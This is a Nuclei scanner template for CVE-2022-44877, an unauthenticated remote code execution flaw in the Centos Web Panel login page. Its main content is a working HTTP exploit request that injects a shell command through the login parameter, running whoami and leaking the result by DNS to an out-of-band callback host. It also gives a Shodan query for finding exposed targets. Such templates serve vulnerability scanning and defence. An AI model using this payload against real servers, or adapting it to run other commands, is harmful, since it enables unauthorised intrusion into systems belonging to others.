id: CVE-2022-44877

info:
  name: Centos Web Panel - Unauthenticated Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: |
    RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.
  reference:
    - https://twitter.com/_0xf4n9x_/status/1612068225046675457
    - https://github.com/numanturle/CVE-2022-44877
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44877
    - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44877
    cwe-id: CWE-78
  metadata:
    shodan-query: http.title:"Login | Control WebPanel"
    verified: "true"
  tags: cve,cve2022,centos,rce,kev

requests:
  - raw:
      - |
        POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=root&password=toor&commit=Login

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "Login Redirect."

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'